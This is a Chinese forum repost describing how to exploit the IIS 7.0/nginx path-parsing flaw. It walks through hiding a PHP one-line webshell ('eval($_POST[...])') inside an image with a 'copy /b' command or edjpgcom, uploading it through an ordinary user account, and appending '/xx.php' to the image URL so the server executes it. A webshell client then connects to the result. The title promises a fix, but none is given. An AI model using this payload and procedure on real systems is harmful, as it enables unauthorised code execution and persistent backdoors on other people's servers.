• 设为首页
  • 收藏本站
  • 积分充值
  • VIP赞助
  • 手机版
  • 微博
  • 微信
    微信公众号 添加方式:
    1:搜索微信号(888888
    2:扫描左侧二维码
  • 快捷导航
    福建二哥 门户 查看主题

    IIS 7.0 网站漏洞利用及修复方法

    发布者: 网神之王 | 发布时间: 2025-6-28 23:20| 查看数: 50| 评论数: 0|帖子模式

    以目前流行的PHP为例:

    先合并一张PHP一句话图片马,合并方法:
    ①、DOS合并:copy 1.gif /b + 1.txt/a php.gif
    ②、用edjpgcom,进行图片和一句话木马的合并,一句话代码为<?php eval($_POST[meckun]);?>

    图片随便找一张.
    【顺带着说一下edjpgcom的使用方法:打开edjpgcom.exe所在文件夹,然后把你所要修改的图片拖动到edjpgcom.exe上面,然后edjpgcom.exe会自动打开,写入想要些的代码即可。
    一句话:
    <?php eval($_POST[meckun]);?>

    然后找个nginx的站,先注册一个用户然后在论坛上传一张我们刚刚合并的图片一句话马。
    找到图片地址,然后在地址后面加个xx.php,在浏览器中运行。
    比如假设图片地址为www.meckun.cn/upload/1.jpg
    则执行地址为www.meckun.cn/upload/1.jpg/xx.php
    然后,会在目录下生成xx.php。比如:www.meckun.cn/upload/x.php
    x.php就是我们的一句话地址。再拿一句话的客户端连接这个一句话地址就好。

    找到某个使用IIS7.0架设的站,然后找到其中的图片上传点(不需要管理权限,普通注册用户即可搞定),把PHP大马后缀改成.jpg,传上去,得到图片地址。

    在图片格式后面添加xx.php
    注:xx随便你怎么填。只要后缀为.php就好
    来源:https://www.jb51.net/hack/41688.html
    免责声明:如果侵犯了您的权益,请联系站长,我们会及时删除侵权内容,谢谢合作!

    最新评论

    浏览过的版块

    QQ Archiver 手机版 小黑屋 福建二哥 ( 闽ICP备2022004717号|闽公网安备35052402000345号 )

    Powered by Discuz! X3.5 © 2001-2023

    快速回复 返回顶部 返回列表